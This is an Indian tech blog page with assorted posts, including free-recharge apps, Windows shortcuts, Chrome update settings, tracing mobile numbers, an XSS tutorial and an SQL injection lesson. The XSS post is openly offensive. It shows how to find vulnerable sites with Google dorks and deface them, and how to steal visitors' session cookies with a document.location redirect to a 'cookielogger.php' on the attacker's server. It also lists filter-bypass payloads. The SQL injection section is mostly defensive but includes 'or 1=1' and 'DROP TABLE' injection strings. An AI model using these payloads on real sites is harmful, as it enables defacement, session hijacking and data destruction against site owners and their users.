Honhar Engineer

Honhar Engineer
Thanks for visiting,stay connected for more updates !
Showing posts with label Trick. Show all posts
Showing posts with label Trick. Show all posts

Sunday, September 14, 2014

android apps to get rree talktime/recharges on your mobile phones

http://honharengineer.blogspot.in/













Free Talktime/Recharges on our Mobile Phones is quite attention gaining thing these days.
Today most of us have Smartphones or Android phone’s so why not do the earning from them ? 
Its quite easy too and believe me even if half of the time devoted to chat on apps like 
Whatsapp/Hike/Line/WeChat etc. is given to these awesome earnings apps they will earn you a quite handy amount! . Which in turn can be used to redeem mobile recharges,Discount coupons etc amazing, isn’t it. 
Making the phone a real “Smart” one. 
So lets have a look on some of Best free Recharge apps to get free to get Talktime/Recharges right on your mobile by doing practically nothing!
Moreover,this free Money/Recharge thingy is quite unpredictable an app developer or company suddenly stops giving the Recharges(e.x MAdlock, UReward, PaisaWiz) or free benefits,thus resulting in Public Outage, hence I have posted only trustworthy apps and will update this post from time to time so no need to worry, you’re absolutely at right place. 

Hike- Messaging app Well, hike was the first app to bring on Free Recharges thing on the Indian market so it remains the first app and the most trusted app ever to win Free Recharges! and this made it the No.1 Indian App on the Play Store.
Method :  Go to hike Menu and use the “Rewards” function to invite your friends to hike by Free sms option, the more friends you invite the more recharges you get! You get Rs.20 Itself as a Sign-Up Bonus,and Rs.20 per friend you refer to hike.you can redeem your Free Recharge as soon as the amount Reaches Rs.50 . Nice way to earn easily isn’t it. If this was less,you also get Free Discount Coupons of Online Shopping Portals,Food Outlets such as Dominoes etc, for each day you remain online on hike!


WeChat- Messaging app
Last time it give away Rs. 60 and currently it is giving Rs. 150.
Stay tuned with it as these apps give recharge time to time.
Method : Just complete the things they ask you to do like sending stickers in group on daily basis and phone calls using their free calling service.

 
Line- Messaging app
Currently it is giving Rs. 120.
Stay tuned with it as these apps give recharge time to time.
Method : Just complete the things they ask you to do like sending stickers in group on daily basis or sending stickers to your friends.


mCent
mCent may be a newer entry for Indian users in this Free Recharge Category, but its present in the Global market from a long time, and i have earned quite a hefty amount from it.   
Method : mCent pays you Rs.10 as sign-up bonus, Plus it pays you Rs.20 for each friend you refer. There is minimum Amount for Redemption. and you can redeem your earnings even if though they are as Less as Rs.10
mCent also pays you for installing apps, Completing Offers and Surveys and its a good amount
On an average Rs.15 are credited to you,just for installing a Single app.! Talk more about awesomeness!


POKKT (Pocket Money App)
POKKT is another great app, which helps you  to earn free recharges, though the download of Other apps, its simple User interface makes it extremely easier to use.
Method : You can use friend referral link to invite friends to POKKT , you get Rs.5 for each friend referred to POKKT , in addition to the Money you get after you download the apps through POKKT.


Amulyam
Amulyam was the first company in India to sponsor free recharges through Ad-viewing . Naturally it wasn’t going to lag behind in the app-for-recharge race.
Method : Amulyam offers Money for installing apps upto the limit of Rs.40, frankly speaking the payout is never so high and infact Amulyam has comparatively lower payouts as compared to other apps. But its the Reliability where it marks ahead. Besides installing Apps and Viewing ads, you can also use the Invite Option to invite your friends.
Amulyam pays Rs.3 on per successful friend Invite.


FreePlus App
FreePlus app is an exciting new app launched with the same architecture to get Free Recharges and Gift Cards. Amount is credited each time you complete the offers by either downloading the apps through it or by viewing the ads.
Method : Install the FreePlus app,Register using your E-Mail ID, and start completing free offers such as Downloading Apps to get Free Recharge amount credited in your wallet. Each App downloaded through FreePlus can earn you upto Rs.20 (max), Also you can earn more by referring your friends to FreePlus. FreePlus provides you Rs.7 per successfull Friend Referral.



Earn Talktime app
Earn Talktime is yet another simple app which lets you earn money/credits by doing actions. Actions may be downloading an app or simply a friend referral.
You can earn upto Rs.20 per successful download and installation of App through Earn Talktime app, Plus you also get additional Rs.7 for each successful Friend Referral!


Ladooo
Ladoo is yet another awesome app to get free Recharges on your Mobile, and the earning methods are similar to the one’s discussed earlier
Method : Just install ladooo on your device and start earning! No need to even register .! Upto Rs.12 are paid per app installation and it also gives Rs.5 for each friend referral! Overall,another good and easy app to have when want to get recharges as well as have timepass.


My Screen
This app is the most unique and Great concept which I have come across, it asks you to Update your Profile,and adds your interests. Then it resides on your screen and shows you the Offers matching to your Interests! . Not only this you simply get paid for Running the App, and even for Making/Receiving a Call!!
Method : Update your profile to earn Points which can be later redeemed for Recharges!


ZipTT 
ZipTT is a newer Entry in this Recharge Market but its Reliable and it provides recharges for installing apps, Watching Videos, Completing Offers as well as referrals .
Method : ZipTT too works on the familiar Download apps to get Recharge,but it also has payment options for getting paid for visiting websites , filling forms there are payment options for watching Ads, Watching Videos and even for completing your profile!.  and once you install any application through it, Open the installed application for about 30Seconds and then leave it. Your cash on Apps credits will be credited to your account which can be redeemed for Mobile Recharges.
The ZipTT also has a referral Option It gives Rs.1 per referral .


Paisa Swipe
Paisa Swipe must be the most easiest of apps which enables you to earn money, all you have to do is install and allow it to be your lock-screen.
Method : it will automatically generate ads and you earn paisa Coins for each Successful unlock of the screen. These Paisa Coins can be then redeemed from the Paisa Swipe Auction using the Cash-out option present on the title bar.

Friday, July 4, 2014

windows 8 keyboard shortcuts

http://honharengineer.blogspot.in








While using Windows 8's new interface in a traditional way might require some time to accommodate, the tasks of navigating through the operating system and its new apps can be simplified by using the keyboard shortcuts that Microsoft has made available. The shortcuts shared in this article were chosen by me while thinking what apps or settings you might access or use on a regular basis. They are simple enough to be easily grasped by anyone and they will help you be more productive in your daily tasks.

  1. Win + C– Brings up the Charms menu, where you can search, share, and change settings
  2. Win + D– Brings up the old Windows desktop
  3. Win + E– Launch Windows Explorer with Computer view displayed
  4. Win + F– Brings up the Metro File search screen
  5. Win + H– Opens the Metro Share panel
  1. Win + I– Opens the Settings panel, where you can change settings for the current app,     change volume, wireless networks, shut down, or adjust the brightness
  2. Win + J– Switches focus between snapped Metro applications
  3. Win + K– Opens the Devices panel (for connecting to a projector or some other device)
  4. Win + L– Lock PC and return to Lock screen
  5. Win + M– Minimize all Windows on the desktop
  6. Win + O– Locks device orientation
  7. Win + P– Choose between available displays
  8. Win + Q– Brings up the Metro App Search screen
  9. Win + R– Switch to the (classic) Windows desktop and display the Run box
  10. Win + U– Switch to the (classic) Windows desktop and launch the Ease of Access Center
  11. Win + V– Cycles through toasts
  12. Win + W– Brings up the Metro Settings search screen
  13. Win + X– Launch Start Menu
  14. Win + Y– Temporarily peek at the desktop
  15. Win + Z– Opens the App Bar for the current Metro application
  16. Win + Page Up / Down– Moves tiles to the left / right
  17. Win + Tab– Opens the Metro application switcher menu, switches between applications
  18. Win + , (comma)– Aero Peek at the desktop
  19. Win + . (period)– Snaps the current Metro application to one side of the screen (Right side)
  20. Win + Shift + . (period)– Snaps the current Metro application to the other side of the screen (Left side)
  21. Win + Space– Switch input language and keyboard layout
  22. Win + Shift + V– Cycles through toasts in reverse order
  23. Win + Enter– Launches Narrator
  24. Win + Arrow Keys – Switch to the (classic) Windows desktop and enable Aero Snap

Any queries or problems??? 
If any then comment below or if its useful then share it with your friends !!!

 

Wednesday, June 25, 2014

code completion not working in Eclipse


honharengineer.blogspot.in











Checking the Java Proposals check-box in
Window -> Preferences -> Java -> Editor -> Content Assist -> Advanced
should resolve this problem.

Monday, June 23, 2014

android.process.acore has stopped unexpectedly force close in Android emulater

honharengineer.blogspot.in














I had the same problem,but finally removed it completely & this is the solution :
The solution: 
In your AVD (Android Virtual Device) manager
Go to->
Settings –> Applications –> Manage Applications –> All 
(button on the top that lets you see all applications) –> scroll down to “Contacts Storage” –> 
Click on “Clear Data”.
 
IT WORKED EVEN IN THE EMULATOR,
you should do this to every emulator type you want to use !!!

Sunday, April 13, 2014

10 Tips To Reduce Blog Loading Time

Reduce Blog Load Time















Blog loading speed is one of the important key  of popular site. To make your site popular it also depends on Blog loading time because if your site load faster than other sites then every one want to open your site just for it fast loading time. Many sites and blogs which have good and quality content are  ruined just cause of loading time so if your site or blog load faster than you will surely get more traffic as you never except.
So, Today we discussed on Blog’ loading time and also see some important tips to reduce Blog loading time which can make your site or blog load faster and show good result.

How To Check Blog Loading Time? 

Well here is many online speed checker tool to check your blog loading time in my point of view here is best tool of Google to check your blog loading time
Google speed checker tool is the best and free speed checker tool which show you accurate loading time of your blog or site.

How To Reduce Blog Loading Time?

To reduce blog loading here are some important effective tips which always work properly to reduce your blog loading time. So let’s have a look:-

1. Avoid To Use Of JavaScript
JavaScript is web scripting language which use to make scripts for Blog or a site. Its very useful for sites. Its also heavy for sites because the scripts are big in size so they effect on loading time so avoid to use too much of JavaScript and only use the scripts you need and link it with your blog.

2. Use Quality Blogger Templates
Be careful to use any template for your blog because many template are too much heavy and
have too much scripts they are not well coded so avoid to use such like these templates. Always try to use a Quality and well coded template for your blog and upload all images which are use in your template on your on server. And in Blogger make a draft post backup of all images which are using in templates.

3. Avoid To Use Too Much Images
Do not use many images in one post try to use one or two images in one post because images are heavy in size so they they also effect on blog loading time

4. Choose A Proper Format For Images
Do not use images which are in JPEG format because JPEG format is too heavy and large in size. So always try to convert images from JPEG to an other format like PNG and GIF because these are light format of images. 

5. Remove Extra Widgets
Do not use any un useful widget in your blog because too mush widgets can effect loading speed so best thing is to remove all un necessary and extra widgets from your blog.

6. Don’t Use Too Much Ads
Avoid to use too much ads on your blog some person wants to increase there earning from ads so they implement too much ads on your blog and at the result they also loose there traffic and visitor. So avoid to use too much ads on blog just implement some ads at important places of blog.

7. Don’t Use Popup Widgets and Ads
Avoid to use popup ads and widgets in your blog because these type of widgets and ads includes Java so that’s why avoid to use these type of items in your blog to get good results.

8. Resize Images For Better Results
Resize all image in your posts as a same format like PNG and GIF and also give all a same size because large size images make problems to open.

9. Use Read More Link In Your Posts
Always use read more link or read more buttons in posts it helps to load your site faster because if you use 2 or more images read more link hide these images from your home page and your site will be faster.

10. Show Few Posts On Homepage
Always try to show 4 or 5 posts on one page because too much posts on homepage can effect on loading time of your blog

Final Words:-
Above are all important tips which can help you to make your site load faster so you can also increase your visitors and also get more traffic if you need any kind of help then please leave a comment.  

Tuesday, April 1, 2014

How to disable silent and automatic updates in Chrome for Windows

When you install a program on to your computer it is important that the owner has full control over what actions are performed by this program. Whether that be because the machine is in an enterprise setting and you need to have perform patch testing or because your a consumer who wants to be notified and give consent when a program is being updated. Regardless of your reasons, it is every users right to know what program is running, when it is running, and why it is running. With this in mind, this tutorial will provide instructions on how to turn off the silent and automatic updates in Google Chrome. In fact, some of the steps described here will work for almost all Google applications available, but for this guide we will focus entirely on Google Chrome.
There are two methods to control how updating occurs in Windows Google applications. The first is through a Group Policy Editor administrative template that is provided by Google. The second method is to manually modify Windows Registry keys that control the behavior of Google applications in regards to how they update. This guide will provide instructions on using both methods as not every version of Windows has access to the Group Policy Editor. For those who do not feel comfortable with the Windows Registry Editor, I have also created a Registry file that enables manual updates for Google Chrome and another one that enables Chrome's default update policy of using silent updates.
It is strongly advised that you continue to update Chrome, and any other application for that matter, when new updates become available regardless of how these updates are found. Outdated programs are a prime vector for malware infections and computer data theft and by not updating your programs you put yourself, your data, and your computer at risk. So even if you set Chrome to use manual updates, please routinely check for updates in order keep Chrome secure.
Is is also important to note that Google Chrome includes Adobe Flash as an integrated plugin. That means that if there a security vulnerability in Flash, which is a common vector for malware infections, you will need to update Chrome in order to receive the latest version of Flash. Therefore, only disable automatic updates if you are in a controlled environment or routinely check for new versions.

Disable Chrome Silent Updates via the Windows Registry
One method to disable silent updates in Chrome is to manually add the policies to the Windows Registry. If you do not care about the specifics of the Windows Registry configurations, you can skip to the Registry files below that can disable and enable silent updates in Chrome. The Windows Registry key responsible for determining how Google Update updates Chrome can be found in the following Registry key and value:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update "Update{8A69D345-D564-463C-AFF1-A69D9E530F96}"
This value can have 4 different DWORD settings assigned to it that describe how Chrome will be updated. These different DWORD values are:
0 - This setting corresponds to the Updates disabled policy setting. This means updates are completely disabled for Chrome.

1 - This setting corresponds to the Always allow updates policy setting. This means that updates are always installed regardless of whether they were found via periodic silent updates or a manual update check.
2 - This setting corresponds to the Manual updates only policy setting. This means updates are only applied when a user performs a manual check.
3 - This setting corresponds to the Automatic silent updates only policy setting. This means updates are only installed when they are found via the periodic silent update check.
To change the Google Update setting for Chrome simply create the above key and value and assign one of the above value.
For those who do not want to mess with the Windows Registry and just want to enable manual updates, I have created two Windows Registry files. The first one will enable Manual updates and the second one will restore Chrome back to its normal defaults of updates being installed via silent updates or manual updates.
Registry file to set Chrome to Manual Updates only
Registry file to reset Chrome back to its default update policy (Manual+Silent Updates)
Simply download one of the above Registry files and save them to your desktop. Then double-click on the registry file and allow the changes to be merged into the Registry. The changes to Google Update for Chrome will now be set.

How to manually check for updates in Google Chrome
If you decide to disable silent updates, then it is becomes important to know how to update Chrome manually. To update Chrome, simply start the program and click on the wrench icon (Wrench icon) in the upper right-hand corner. When the menu appears, click on the About Google Chrome menu item. If there is a new update available, Chrome will alert you in the About Chrome screen and provide instructions on how to apply that update.

Friday, March 7, 2014

How to Protect Your Eyes While Being On The Computer

Hi all users, if you are a die hard computer fan and love to spent your most of the time in front of you computer screen but don't want to give strain on your eyes by staring at your computer or laptop screen for hours every day. Then this tutorial will be proven very helpful for you, because in this tutorial I will tell you how you can protect you eyes without doing detection in the time that you spent on your computer.
Programming is the job where you have to be on computer to code, debug and get new ideas for your new your program, commonly a programmer spends at least his 8 hours in front of his or her computer. While being on  on your computer at night you must have feel uncomfortable and started adjusting the system display settings to make your eyes feel comfortable and again in morning you need to set it back to the normal settings.
So instead of doing this almost every day you should give a try to F.lux. F.lux is a free app which automatically controls and adjusts the display of your screen on day and night, according to your location and time you have set on your computer, or you can manually set your location by entering the latitude and longitude.

When its day time it will keep your screen display cooler and at night when sun goes down (sunset) it will make your screen warm. In starting you may not like it but you can change the settings temporarily, so that you can get comfortable with. You will find settings in system try of your task bar.
If you feel that color is changing  too fast, then you can change the settings and make the transition slow. For sure this is app not for people like graphic designers or someone who looks for accuracy in color display on their screen. However if you want this app to disable for certain time then you can as this app has an option to disable it for an hour.

 Take Care :)

How to Trace a Mobile Number



Hi friends, in today's world's lifestyle mobile is the most important device for daily life and now a days every one is having mobile no matter of their class or richness even a rickshaw driver have a personal mobile with him :P . So often the disadvantages are equal to the advantages.One major problem which is increasing day by day is getting MISSED CALLS and prank calls. Some times this may lead to some serious issue so for this problem i am writing an article  How can you trace mobile number by yourself ? you can use this tutorial as well if you wanna know the identification of the mobile number owner. Ok lets get started.
Tracing a Mobile Number:
1.Mobile telephone numbering in India:

Here in this method we can see list of  of mobile numbers with location and telecom operator. all you need is to just search the list first four digits. This process is bit confussing and takes some time. Click here to go to wikipedia page


2.Trace mobile number by online:

Here in this process you can trace mobile number by just entering  the number you want to trace in the search column click the below link to trace mobile number

Mobile Number Locator Software Download:
When you download mobile number locator software you can trace mobile number from your mobile
Download Mobile number locator

Other Methods of Tracing Name Using Mobile Number:
To Trace Mobile Number with Name download the True Caller app from it's official website and ENTER THE MOBILE NUMBER and you will able to do the following things:
You Can Trace Mobile number with Name upto 90% Correctly
You Can Download This APP on your Android Mobile
You can Download this app to your PC running Android Apps on PC

Download True caller for your Mobile Now:

Download For Android 
Download For IOS
Download For Windows Mobile
Download For Blackberry 
Download For Symbian

Sunday, February 23, 2014

Cross-site Scripting XSS Attacks

'XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerability 
found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply  "phishing" on falls users.
This technique is also used for website Hacking.


Types of XSS: 
There are actually three types of Cross-Site Scripting, commonly named as:

  1. DOM-Based XSS
  2. Non-persistent XSS
  3. Persistent XSS

DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
 - The attacker creates a well builded malicious website
 - The ingenuous user opens that site
 - The user has a vulnerable page on his machine
 - The attacker's website sends commands to the vulnerable HTML page
 - The vulnerable local page execute that commands with the user's privileges
  on that machine.
 - The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website 
is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn't need to
 provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbooks". Usually the users uses 
that kind of tool to leave messages to the owned 
of the website and at a first look it doesn't seems something dangerous, but if an 
attacker discover that the system is vulnerable can insert some malicious code in his
 message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any 
check on the content of the inserted message: it just inserts the data provided from 
the user into the result page.


How to Find XSS Vulnerabilities:-


To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good 
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS:
Well now lets start learning some Actual Methods, the most common used XSS 
injection is :

<script>alert("Priyanshu")</script>

now this will alert a popup message, saying "Priyanshu" without quotes.

So,use "search.php?q=" and you can simple try the following on a website with the
 same thing,

http://website.com/search.php?q=<script>alert("Priyanshu")</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.

Example:


How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface 
methods, there are many ways for defacing i will mention some of the best and most used, 
the first one being IMG SCR, now for those of you who dont know html, IMG SCR 
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything 
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to 
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf" 

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>

There are many others ways that you can found using Google or other website. 
Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make 
cookie logger from here: 

How To Make A Cookie Stealer Php script ? 

ok now you have it save it has a .php file and upload to your server, remember to 
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do. 
ok now your gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


How to Bypass Filtration ?

Alot of sites may seem vulnerable but not executing the code, well to solve this read 
this. Some common methods to bypass filtration is

')alert('xss');
or
");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server. 
You can also try hexing or base64 encoding your data before you submit, Please note
 its bad practice to use alert("XSS") to test for XSS, because some sites block the 
keyword "XSS" before so we using "Priyanshu".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz<script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000xyz</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://virus.js'</script>


Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many 
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here 

http://www.asciitable.com/
http://easycalculation.com/

This will help you write what you want, In my examples ill be writing "HOC" this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC". 
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>

SQL Injection Attack

An SQL Injection can destroy your database.

SQL in Web Pages

In the previous chapters, you have learned to retrieve (and update) database data, using SQL.
When SQL is used to display data on a web page, it is common to let web users input their own search values.
Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data:

Server Code

txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
The example above, creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page.
The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statements, via web page input.
Injected SQL commands can alter SQL statement and compromises the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above, one more time.
Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id.
If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:
UserId:

Server Result

SELECT * FROM Users WHERE UserId = 105 or 1=1
The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true.
Does the example above seem dangerous? What if the Users table contains names and passwords?
The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True

Here is a common construction, used to verify user login to a web site:
User Name:
Password:

Server Code

uName = getRequestString("UserName");
uPass = getRequestString("UserPass");

sql = "SELECT * FROM Users WHERE Name ='" + uName + "' AND Pass ='" + uPass + "'"
A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box.
The code at the server will create a valid SQL statement like this:

Result

SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The result SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL

Most databases support batched SQL statement, separated by semicolon.

Example

SELECT * FROM Users; DROP TABLE Suppliers
The SQL above will return all rows in the Customers table, and then delete the table called Suppliers.
If we had the following server code:

Server Code

txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id:
The code at the server would create a valid SQL statement like this:

Result

SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers


Parameters for Protection

Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks.
This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input.
(In fact it should be perfectly legal to input an SQL statement in a database field.)
The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters.
SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.

ASP.NET Razor Example

txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = @0";
db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker.
The SQL engine checks each parameter to ensure that it is the correct for its column, and are treated literally, and not as part of the SQL to be executed.

Another Example

txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
db.Execute(txtSQL,txtNam,txtAdd,txtCit);

NoteYou have just learned to avoid SQL injection. One of the top website vulnerabilities.


Examples

The following examples shows how to build parameterized queries in some common web languages.
ASP.NET SELECT
txtUserId = getRequestString("UserId");
sql = "SELECT * FROM Customers WHERE CustomerId = @0";
command = new SqlCommand(sql);
command.Parameters.AddWithValue("@0",txtUserID);
command.ExecuteReader();
ASP.NET INSERT INTO
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
command = new SqlCommand(txtSQL);
command.Parameters.AddWithValue("@0",txtNam);
command.Parameters.AddWithValue("@1",txtAdd);
command.Parameters.AddWithValue("@2",txtCit);
command.ExecuteNonQuery();
PHP INSERT INTO
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City)
VALUES (:nam, :add, :cit)");
$stmt->bindParam(':nam', $txtNam);
$stmt->bindParam(':val', $txtAdd);
$stmt->bindParam(':cit', $txtCit);
$stmt->execute();